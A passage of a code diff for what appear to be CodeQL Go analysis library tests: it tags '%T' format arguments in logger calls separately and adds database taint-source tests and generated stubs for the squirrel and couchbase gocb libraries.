utils.test.InlineExpectationsTest module LoggerTest implements TestSig { - string getARelevantTag() { result = "logger" } + string getARelevantTag() { result = ["type-logger", "logger"] } predicate hasActualResult(Location location, string element, string tag, string value) { exists(LoggerCall log | log.getLocation() = location and element = log.toString() and - value = log.getAMessageComponent().toString() and - tag = "logger" + ( + value = log.getAValueFormattedMessageComponent().toString() and + tag = "logger" + or + value = log.getAMessageComponent().toString() and + not value = log.getAValueFormattedMessageComponent().toString() and + tag = "type-logger" + ) ) } } diff --git a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/glog.go b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/glog.go index 6913bfc95760..ab82527b5e0c 100644 --- a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/glog.go +++ b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/glog.go @@ -30,6 +30,13 @@ func glogTest() { glog.Warningf(fmt, text) // $ logger=fmt logger=text glog.Warningln(text) // $ logger=text + // components corresponding to the format specifier "%T" are not considered vulnerable + glog.Errorf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + glog.Exitf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + glog.Fatalf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + glog.Infof("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + glog.Warningf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + klog.Error(text) // $ logger=text klog.ErrorDepth(0, text) // $ logger=text klog.Errorf(fmt, text) // $ logger=fmt logger=text @@ -50,4 +57,11 @@ func glogTest() { klog.WarningDepth(0, text) // $ logger=text klog.Warningf(fmt, text) // $ logger=fmt logger=text klog.Warningln(text) // $ logger=text + + // components corresponding to the format specifier "%T" are not considered vulnerable + klog.Errorf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + klog.Exitf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + klog.Fatalf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + klog.Infof("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + klog.Warningf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v } diff --git a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/logrus.go b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/logrus.go index ce2d3ba4e253..bdb57aae2e1b 100644 --- a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/logrus.go +++ b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/logrus.go @@ -32,4 +32,8 @@ func logrusCalls() { logrus.Panicln(text) // $ logger=text logrus.Infof(fmt, text) // $ logger=fmt logger=text logrus.FatalFn(fn) // $ logger=fn + + // components corresponding to the format specifier "%T" are not considered vulnerable + logrus.Infof("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + logrus.Fatalf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v } diff --git a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/main.go b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/main.go index bb2111afbec1..5353d9155ccb 100644 --- a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/main.go +++ b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/main.go @@ -3,6 +3,8 @@ package main const fmt = "formatted %s string" const text = "test" -func main() { +var v []byte +func main() { + stdlib() } diff --git a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/stdlib.go b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/stdlib.go index f8401865b490..6fbf3c43fd35 100644 --- a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/stdlib.go +++ b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/stdlib.go @@ -17,6 +17,11 @@ func stdlib() { logger.Printf(fmt, text) // $ logger=fmt logger=text logger.Println(text) // $ logger=text + // components corresponding to the format specifier "%T" are not considered vulnerable + logger.Fatalf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + logger.Panicf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + logger.Printf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + log.SetPrefix("prefix: ") log.Fatal(text) // $ logger=text log.Fatalf(fmt, text) // $ logger=fmt logger=text @@ -27,4 +32,9 @@ func stdlib() { log.Print(text) // $ logger=text log.Printf(fmt, text) // $ logger=fmt logger=text log.Println(text) // $ logger=text + + // components corresponding to the format specifier "%T" are not considered vulnerable + log.Fatalf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + log.Panicf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v + log.Printf("%s: found type %T", text, v) // $ logger="%s: found type %T" logger=text type-logger=v } diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/go.mod b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/go.mod index 36491d136fac..560bcd759c34 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/go.mod +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/go.mod @@ -1,9 +1,59 @@ module test -go 1.22.5 +go 1.24 require ( - gorm.io/gorm v1.23.0 + github.com/astaxie/beego v1.12.3 + github.com/beego/beego/v2 v2.3.5 + github.com/couchbase/gocb v1.6.7 + github.com/couchbase/gocb/v2 v2.9.4 github.com/jmoiron/sqlx v1.4.0 - go.mongodb.org/mongo-driver/mongo v1.17.2 + github.com/Masterminds/squirrel v1.5.4 + github.com/rqlite/gorqlite v0.0.0-20250128004930-114c7828b55a + go.mongodb.org/mongo-driver v1.17.3 + gorm.io/gorm v1.25.12 + github.com/nonexistent/sources v0.0.0-20250300000000-000000000000 +) + +require ( + github.com/couchbase/gocbcore/v10 v10.5.4 // indirect + github.com/couchbase/gocbcoreps v0.1.3 // indirect + github.com/couchbase/goprotostellar v1.0.2 // indirect + github.com/couchbaselabs/gocbconnstr/v2 v2.0.0-20240607131231-fb385523de28 // indirect + github.com/go-logr/logr v1.4.1 // indirect + github.com/go-logr/stdr v1.2.2 // indirect + github.com/golang/snappy v0.0.4 // indirect + github.com/google/uuid v1.6.0 // indirect + github.com/grpc-ecosystem/go-grpc-middleware v1.4.0 // indirect + github.com/hashicorp/golang-lru v0.5.4 // indirect + github.com/jinzhu/inflection v1.0.0 // indirect + github.com/jinzhu/now v1.1.5 // indirect + github.com/klauspost/compress v1.16.7 // indirect + github.com/montanaflynn/stats v0.7.1 // indirect + github.com/opentracing/opentracing-go v1.2.0 // indirect + github.com/pkg/errors v0.9.1 // indirect + github.com/shiena/ansicolor v0.0.0-20200904210342-c7312218db18 // indirect + github.com/valyala/bytebufferpool v1.0.0 // indirect + github.com/xdg-go/pbkdf2 v1.0.0 // indirect + github.com/xdg-go/scram v1.1.2 // indirect + github.com/xdg-go/stringprep v1.0.4 // indirect + github.com/youmark/pkcs8 v0.0.0-20240726163527-a2c0da244d78 // indirect + go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 // indirect + go.opentelemetry.io/otel v1.24.0 // indirect + go.opentelemetry.io/otel/metric v1.24.0 // indirect + go.opentelemetry.io/otel/trace v1.24.0 // indirect + go.uber.org/multierr v1.11.0 // indirect + go.uber.org/zap v1.27.0 // indirect + golang.org/x/crypto v0.26.0 // indirect + golang.org/x/net v0.24.0 // indirect + golang.org/x/sync v0.8.0 // indirect + golang.org/x/sys v0.23.0 // indirect + golang.org/x/text v0.17.0 // indirect + google.golang.org/genproto/googleapis/rpc v0.0.0-20240401170217-c3f982113cda // indirect + google.golang.org/grpc v1.63.2 // indirect + google.golang.org/protobuf v1.34.2 // indirect + gopkg.in/couchbase/gocbcore.v7 v7.1.18 // indirect + gopkg.in/couchbaselabs/gocbconnstr.v1 v1.0.4 // indirect + gopkg.in/couchbaselabs/gojcbmock.v1 v1.0.4 // indirect + gopkg.in/couchbaselabs/jsonx.v1 v1.0.1 // indirect ) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/source.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/source.ext.yml index 853b9e9a719f..5e7e11e1b313 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/source.ext.yml +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/source.ext.yml @@ -3,4 +3,9 @@ extensions: pack: codeql/threat-models extensible: threatModelConfiguration data: - - ["database", true, 0] \ No newline at end of file + - ["database", true, 0] + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/sources", "", False, "Source", "", "", "ReturnValue", "database", "manual"] \ No newline at end of file diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test.ext.yml index 00f4b3659c37..45623fd20ad2 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test.ext.yml +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test.ext.yml @@ -5,3 +5,9 @@ extensions: extensible: threatModelConfiguration data: - ["database", true, 0] + + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/sources", "", False, "Source", "", "", "ReturnValue", "database", "manual"] \ No newline at end of file diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_Masterminds_squirrel.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_Masterminds_squirrel.go new file mode 100644 index 000000000000..cc1418e884cf --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_Masterminds_squirrel.go @@ -0,0 +1,291 @@ +package test + +//go:generate depstubber -vendor github.com/Masterminds/squirrel DeleteBuilder,InsertBuilder,QueryRower,QueryRowerContext,Queryer,QueryerContext,SelectBuilder,StdSql,StdSqlCtx,UpdateBuilder QueryContextWith,QueryRowContextWith,QueryRowWith,QueryWith + +import ( + "context" + + "github.com/Masterminds/squirrel" + src "github.com/nonexistent/sources" +) + +func test_Masterminds_squirrel_QueryRower(ctx context.Context, db squirrel.QueryRower, sqlizer squirrel.Sqlizer) { + scanner := db.QueryRow("") // $ source + + var r1, r2, r3 string + scanner.Scan(&r1, &r2, &r3) + + sink(r1) // $ hasTaintFlow="r1" + sink(r2) // $ hasTaintFlow="r2" + sink(r3) // $ hasTaintFlow="r3" + + scanner2 := squirrel.QueryRowWith(db, sqlizer) // $ source + + var r4, r5, r6 string + scanner2.Scan(&r4, &r5, &r6) + + sink(r4) // $ hasTaintFlow="r4" + sink(r5) // $ hasTaintFlow="r5" + sink(r6) // $ hasTaintFlow="r6" +} + +func test_Masterminds_squirrel_QueryRowerContext(ctx context.Context, db squirrel.QueryRowerContext, sqlizer squirrel.Sqlizer) { + scanner := db.QueryRowContext(ctx, "") // $ source + + var r1, r2, r3 string + scanner.Scan(&r1, &r2, &r3) + + sink(r1) // $ hasTaintFlow="r1" + sink(r2) // $ hasTaintFlow="r2" + sink(r3) // $ hasTaintFlow="r3" + + scanner2 := squirrel.QueryRowContextWith(ctx, db, sqlizer) // $ source + + var r4, r5, r6 string + scanner2.Scan(&r4, &r5, &r6) + + sink(r4) // $ hasTaintFlow="r4" + sink(r5) // $ hasTaintFlow="r5" + sink(r6) // $ hasTaintFlow="r6" +} + +func test_Masterminds_squirrel_Queryer(ctx context.Context, db squirrel.Queryer, sqlizer squirrel.Sqlizer) { + v1, err := db.Query("") // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := squirrel.QueryWith(db, sqlizer) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" +} + +func test_Masterminds_squirrel_QueryerContext(ctx context.Context, db squirrel.QueryerContext, sqlizer squirrel.Sqlizer) { + v1, err := db.QueryContext(ctx, "") // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := squirrel.QueryContextWith(ctx, db, sqlizer) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" +} + +// StdSqlCtx extends StdSql so we can test both with a StdSqlCtx +func test_Masterminds_squirrel_StdSql_StdSqlCtx(ctx context.Context, std squirrel.StdSqlCtx) { + v1, err := std.Query("") // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := std.QueryContext(ctx, "") // $ source + if err != nil { + return + } + + sink(v2) // $ hasTaintFlow="v2" + + s3 := std.QueryRow("") // $ source + + if err != nil { + return + } + var r31, r32, r33 string + s3.Scan(&r31, &r32, &r33) + + sink(r31) // $ hasTaintFlow="r31" + sink(r32) // $ hasTaintFlow="r32" + sink(r33) // $ hasTaintFlow="r33" + + s4 := std.QueryRowContext(ctx, "") // $ source + + var r41, r42, r43 string + s4.Scan(&r41, &r42, &r43) + + sink(r41) // $ hasTaintFlow="r41" + sink(r42) // $ hasTaintFlow="r42" + sink(r43) // $ hasTaintFlow="r43" +} + +func test_Masterminds_squirrel_DeleteBuilder(ctx context.Context, builder squirrel.DeleteBuilder) { + v1, err := builder.Query() // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := builder.QueryContext(ctx) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" + + s3 := builder.QueryRowContext(ctx) // $ source + + var r31, r32, r33 string + s3.Scan(&r31, &r32, &r33) + + sink(r31) // $ hasTaintFlow="r31" + sink(r32) // $ hasTaintFlow="r32" + sink(r33) // $ hasTaintFlow="r33" + + builder2 := src.Source[squirrel.DeleteBuilder]() // $ source + + var r41, r42, r43 string + builder2.ScanContext(ctx, &r41, &r42, &r43) + + sink(r41) // $ hasTaintFlow="r41" + sink(r42) // $ hasTaintFlow="r42" + sink(r43) // $ hasTaintFlow="r43" +} + +func test_Masterminds_squirrel_InsertBuilder(ctx context.Context, builder squirrel.InsertBuilder) { + v1, err := builder.Query() // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := builder.QueryContext(ctx) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" + + s3 := builder.QueryRow() // $ source + + var r31, r32, r33 string + s3.Scan(&r31, &r32, &r33) + + sink(r31) // $ hasTaintFlow="r31" + sink(r32) // $ hasTaintFlow="r32" + sink(r33) // $ hasTaintFlow="r33" + + s4 := builder.QueryRowContext(ctx) // $ source + + var r41, r42, r43 string + s4.Scan(&r41, &r42, &r43) + + sink(r41) // $ hasTaintFlow="r41" + sink(r42) // $ hasTaintFlow="r42" + sink(r43) // $ hasTaintFlow="r43" + + builder2 := src.Source[squirrel.InsertBuilder]() // $ source + + var r51, r52, r53 string + builder2.Scan(&r51, &r52, &r53) + + sink(r51) // $ hasTaintFlow="r51" + sink(r52) // $ hasTaintFlow="r52" + sink(r53) // $ hasTaintFlow="r53" + + var r61, r62, r63 string + builder2.ScanContext(ctx, &r61, &r62, &r63) + + sink(r61) // $ hasTaintFlow="r61" + sink(r62) // $ hasTaintFlow="r62" + sink(r63) // $ hasTaintFlow="r63" +} + +func test_Masterminds_squirrel_SelectBuilder(ctx context.Context, builder squirrel.SelectBuilder) { + v1, err := builder.Query() // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := builder.QueryContext(ctx) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" + + s3 := builder.QueryRow() // $ source + + var r31, r32, r33 string + s3.Scan(&r31, &r32, &r33) + + sink(r31) // $ hasTaintFlow="r31" + sink(r32) // $ hasTaintFlow="r32" + sink(r33) // $ hasTaintFlow="r33" + + s4 := builder.QueryRowContext(ctx) // $ source + + var r41, r42, r43 string + s4.Scan(&r41, &r42, &r43) + + sink(r41) // $ hasTaintFlow="r41" + sink(r42) // $ hasTaintFlow="r42" + sink(r43) // $ hasTaintFlow="r43" + + builder2 := src.Source[squirrel.SelectBuilder]() // $ source + + var r51, r52, r53 string + builder2.Scan(&r51, &r52, &r53) + + sink(r51) // $ hasTaintFlow="r51" + sink(r52) // $ hasTaintFlow="r52" + sink(r53) // $ hasTaintFlow="r53" + + var r61, r62, r63 string + builder2.ScanContext(ctx, &r61, &r62, &r63) + + sink(r61) // $ hasTaintFlow="r61" + sink(r62) // $ hasTaintFlow="r62" + sink(r63) // $ hasTaintFlow="r63" +} + +func test_Masterminds_squirrel_UpdateBuilder(ctx context.Context, builder squirrel.UpdateBuilder) { + v1, err := builder.Query() // $ source + if err != nil { + return + } + sink(v1) // $ hasTaintFlow="v1" + + v2, err := builder.QueryContext(ctx) // $ source + if err != nil { + return + } + sink(v2) // $ hasTaintFlow="v2" + + s3 := builder.QueryRow() // $ source + + var r31, r32, r33 string + s3.Scan(&r31, &r32, &r33) + + sink(r31) // $ hasTaintFlow="r31" + sink(r32) // $ hasTaintFlow="r32" + sink(r33) // $ hasTaintFlow="r33" + + s4 := builder.QueryRowContext(ctx) // $ source + + var r41, r42, r43 string + s4.Scan(&r41, &r42, &r43) + + sink(r41) // $ hasTaintFlow="r41" + sink(r42) // $ hasTaintFlow="r42" + sink(r43) // $ hasTaintFlow="r43" + + builder2 := src.Source[squirrel.UpdateBuilder]() // $ source + + var r51, r52, r53 string + builder2.Scan(&r51, &r52, &r53) + + sink(r51) // $ hasTaintFlow="r51" + sink(r52) // $ hasTaintFlow="r52" + sink(r53) // $ hasTaintFlow="r53" + + var r61, r62, r63 string + builder2.ScanContext(ctx, &r61, &r62, &r63) + + sink(r61) // $ hasTaintFlow="r61" + sink(r62) // $ hasTaintFlow="r62" + sink(r63) // $ hasTaintFlow="r63" +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_beego_orm.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_beego_orm.go index 93138c69a580..1f5e31ebf72c 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_beego_orm.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_beego_orm.go @@ -1,5 +1,8 @@ package test +//go:generate depstubber -vendor github.com/astaxie/beego/orm Ormer NewOrm +//go:generate depstubber -vendor github.com/beego/beego/v2/client/orm DB,DQL,Ormer NewOrm + import ( oldOrm "github.com/astaxie/beego/orm" "github.com/beego/beego/v2/client/orm" diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v1.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v1.go new file mode 100644 index 000000000000..5bddde4b2383 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v1.go @@ -0,0 +1,57 @@ +package test + +//go:generate depstubber -vendor github.com/couchbase/gocb Cluster,AnalyticsResults,QueryResults,SearchResults + +import "github.com/couchbase/gocb" + +func test_couchbase_gocb_v1_Cluster(cluster *gocb.Cluster, aq *gocb.AnalyticsQuery, n1ql *gocb.N1qlQuery, sq *gocb.SearchQuery) { + // Analytics + r1, err := cluster.ExecuteAnalyticsQuery(aq, nil) // $ source + + if err != nil { + return + } + + var user1, user2 User + + r1.One(&user1) + sink(user1) // $ hasTaintFlow="user1" + + for r1.Next(user2) { + sink(user2) // $ hasTaintFlow="user2" + } + + var b1 []byte + b1 = r1.NextBytes() + sink(b1) // $ hasTaintFlow="b1" + + // N1QL + r2, err := cluster.ExecuteN1qlQuery(n1ql, nil) // $ source + + if err != nil { + return + } + + var user3, user4 User + + r2.One(&user3) + sink(user3) // $ hasTaintFlow="user3" + + for r2.Next(user4) { + sink(user4) // $ hasTaintFlow="user4" + } + + var b2 []byte + b2 = r2.NextBytes() + sink(b2) // $ hasTaintFlow="b2" + + // Search + r3, err := cluster.ExecuteSearchQuery(sq) // $ source + + if err != nil { + return + } + + hit := r3.Hits()[0] + sink(hit) // $ hasTaintFlow="hit" +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v2.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v2.go new file mode 100644 index 000000000000..151b90056605 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_couchbase_gocb_v2.go @@ -0,0 +1,247 @@ +package test + +//go:generate depstubber -vendor github.com/couchbase/gocb/v2 AnalyticsResult,AnalyticsResultRaw,Cluster,Collection,ExistsResult,GetResult,LookupInReplicaResult,LookupInResult,MutateInResult,MutationResult,QueryResult,QueryResultRaw,Result,ScanResult,ScanResultItem,Scope,SearchResult,SearchResultRaw,TransactionAttemptContext,TransactionGetResult,TransactionQueryResult,ViewIndexManager,ViewResult,ViewResultRaw + +import "github.com/couchbase/gocb/v2" + +func test_couchbase_gocb_v2_Cluster(cluster *gocb.Cluster) { + r1, err := cluster.AnalyticsQuery("SELECT * FROM `travel-sample`", nil) // $ source + + if err != nil { + return + } + + for r1.Next() { + var name1, name2 string + + r1.One(&name1) + + sink(name1) // $ hasTaintFlow="name1" + + r1.Row(&name2) + sink(name2) // $ hasTaintFlow="name2" + + b := r1.Raw().NextBytes() + sink(b) // $ hasTaintFlow="b" + } + + r2, err := cluster.Query("SELECT * FROM `travel-sample`", nil) // $ source + + if err != nil { + return + } + + for r2.Next() { + var name1, name2 string + + r2.One(&name1) + + sink(name1) // $ hasTaintFlow="name1" + + r2.Row(&name2) + sink(name2) // $ hasTaintFlow="name2" + + b := r2.Raw().NextBytes() + sink(b) // $ hasTaintFlow="b" + } +} + +func test_couchbase_gocb_v2_Scope(scope *gocb.Scope) { + r1, err := scope.AnalyticsQuery("SELECT * FROM `travel-sample`", nil) // $ source + + if err != nil { + return + } + + for r1.Next() { + var name1, name2 string + + r1.One(&name1) + + sink(name1) // $ hasTaintFlow="name1" + + r1.Row(&name2) + sink(name2) // $ hasTaintFlow="name2" + + b := r1.Raw().NextBytes() + sink(b) // $ hasTaintFlow="b" + } + + r2, err := scope.Query("SELECT * FROM `travel-sample`", nil) // $ source + + if err != nil { + return + } + + for r2.Next() { + var name1, name2 string + + r2.One(&name1) + + sink(name1) // $ hasTaintFlow="name1" + + r2.Row(&name2) + sink(name2) // $ hasTaintFlow="name2" + + b := r2.Raw().NextBytes() + sink(b) // $ hasTaintFlow="b" + } +} + +func test_couchbase_gocb_v2_Collection(coll *gocb.Collection) { + type User struct { + Name string + } + + var user User + + r1, err := coll.Get("documentID", nil) // $ source + + if err != nil { + return + } + + r1.Content(&user) + + sink(user) // $ hasTaintFlow="user" + + r2, err := coll.GetAndLock("documentID", 30, nil) // $ source + + if err != nil { + return + } + + sink(r2) // $ hasTaintFlow="r2" + + r3, err := coll.GetAndTouch("documentID", 30, nil) // $ source + + if err != nil { + return + } + + var user3 User + r3.Content(&user3) + sink(user3) // $ hasTaintFlow="user3" + + r4, err := coll.GetAnyReplica("documentID", nil) // $ source + + if err != nil { + return + } + + sink(r4) // $ hasTaintFlow="r4" + + r5, err := coll.LookupIn("documentID", []gocb.LookupInSpec{}, nil) // $ source + + if err != nil { + return + } + + var user5 User + r5.ContentAt(0, &user5) + sink(user5) // $ hasTaintFlow="user5" + + r6, err := coll.LookupInAllReplicas("documentID", []gocb.LookupInSpec{}, nil) // $ source + + if err != nil { + return + } + + var user6 User + r6.Next().ContentAt(0, &user6) + sink(user6) // $ hasTaintFlow="user6" + + r7, err := coll.LookupInAnyReplica("documentID", []gocb.LookupInSpec{}, nil) // $ source + + if err != nil { + return + } + + var user7 User + r7.ContentAt(0, &user7) + sink(user7) // $ hasTaintFlow="user7" + + r8, err := coll.Scan(nil, nil) // $ source + + if err != nil { + return + } + + var user8 User + r8.Next().Content(&user8) + sink(user8) // $ hasTaintFlow="user8" +} + +func test_couchbase_gocb_v2_TransactionAttemptContext(tam *gocb.TransactionAttemptContext, coll *gocb.Collection) { + r1, err := tam.Get(coll, "documentID") // $ source + + if err != nil { + return + } + + var user User + r1.Content(&user) + + sink(user) // $ hasTaintFlow="user" + + r2, err := tam.GetReplicaFromPreferredServerGroup(coll, "documentID") // $ source + + if err != nil { + return + } + + var user2 User + r2.Content(&user2) + sink(user2) // $ hasTaintFlow="user2" + + var user3 User + + r3, err := tam.Insert(coll, "documentID", &user3) // $ source + if err != nil { + return + } + + var user4 User + r3.Content(&user4) + sink(user4) // $ hasTaintFlow="user4" + + r4, err := tam.Query("SELECT * FROM `travel-sample`", nil) // $ source + if err != nil { + return + } + + for r4.Next() { + var user5 User + r4.One(&user5) + sink(user5) // $ hasTaintFlow="user5" + + var user6 User + r4.Row(&user6) + sink(user6) // $ hasTaintFlow="user6" + } + + r5, err := tam.Replace(r3, user4) // $ source + if err != nil { + return + } + + sink(r5) // $ hasTaintFlow="r5" +} + +func test_couchbase_gocb_v2_ViewIndexManager(v *gocb.ViewIndexManager) { + doc, err := v.GetDesignDocument("name", 0, nil) // $ source + + if err != nil { + return + } + + sink(doc) // $ hasTaintFlow="doc" + + docs, err := v.GetAllDesignDocuments(0, nil) // $ source + + if err != nil { + return + } + + sink(docs) // $ hasTaintFlow="docs" +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_gorm.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_gorm.go index 9fc1de0de4ef..e0c5a1182e22 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_gorm.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_gorm.go @@ -1,5 +1,7 @@ package test +//go:generate depstubber -vendor gorm.io/gorm Association,ConnPool,DB + import "gorm.io/gorm" // test querying an Association diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_jmoiron_sqlx.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_jmoiron_sqlx.go index ce3dea5b532c..ecb99305cb75 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_jmoiron_sqlx.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/test_jmoiron_sqlx.go @@ -1,5 +1,7 @@ package test +//go:generate depstubber -vendor github.com/jmoiron/sqlx Conn,DB,NamedStmt,Stmt,Tx Get,GetContext,NamedQuery,NamedQueryContext,Select,SelectContext + import ( "context" diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/Masterminds/squirrel/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/Masterminds/squirrel/stub.go new file mode 100644 index 000000000000..5b77477bb682 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/Masterminds/squirrel/stub.go @@ -0,0 +1,501 @@ +// Code generated by depstubber. DO NOT EDIT. +// This is a simple stub for github.com/Masterminds/squirrel, strictly for use in testing. + +// See the LICENSE file for information about the licensing of the original library. +// Source: github.com/Masterminds/squirrel (exports: DeleteBuilder,InsertBuilder,QueryRower,QueryRowerContext,Queryer,QueryerContext,SelectBuilder,StdSql,StdSqlCtx,UpdateBuilder; functions: QueryContextWith,QueryRowContextWith,QueryRowWith,QueryWith) + +// Package squirrel is a stub of github.com/Masterminds/squirrel, generated by depstubber. +package squirrel + +import ( + context "context" + sql "database/sql" +) + +type BaseRunner interface { + Exec(_ string, _ ...interface{}) (sql.Result, error) + Query(_ string, _ ...interface{}) (*sql.Rows, error) +} + +type DeleteBuilder struct{} + +func (_ DeleteBuilder) Exec() (sql.Result, error) { + return nil, nil +} + +func (_ DeleteBuilder) ExecContext(_ context.Context) (sql.Result, error) { + return nil, nil +} + +func (_ DeleteBuilder) From(_ string) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) Limit(_ uint64) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) MustSql() (string, []interface{}) { + return "", nil +} + +func (_ DeleteBuilder) Offset(_ uint64) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) OrderBy(_ ...string) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) PlaceholderFormat(_ PlaceholderFormat) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) Prefix(_ string, _ ...interface{}) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) PrefixExpr(_ Sqlizer) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) Query() (*sql.Rows, error) { + return nil, nil +} + +func (_ DeleteBuilder) QueryContext(_ context.Context) (*sql.Rows, error) { + return nil, nil +} + +func (_ DeleteBuilder) QueryRowContext(_ context.Context) RowScanner { + return nil +} + +func (_ DeleteBuilder) RunWith(_ BaseRunner) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) ScanContext(_ context.Context, _ ...interface{}) error { + return nil +} + +func (_ DeleteBuilder) Suffix(_ string, _ ...interface{}) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) SuffixExpr(_ Sqlizer) DeleteBuilder { + return DeleteBuilder{} +} + +func (_ DeleteBuilder) ToSql() (string, []interface{}, error) { + return "", nil, nil +} + +func (_ DeleteBuilder) Where(_ interface{}, _ ...interface{}) DeleteBuilder { + return DeleteBuilder{} +} + +type InsertBuilder struct{} + +func (_ InsertBuilder) Columns(_ ...string) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) Exec() (sql.Result, error) { + return nil, nil +} + +func (_ InsertBuilder) ExecContext(_ context.Context) (sql.Result, error) { + return nil, nil +} + +func (_ InsertBuilder) Into(_ string) 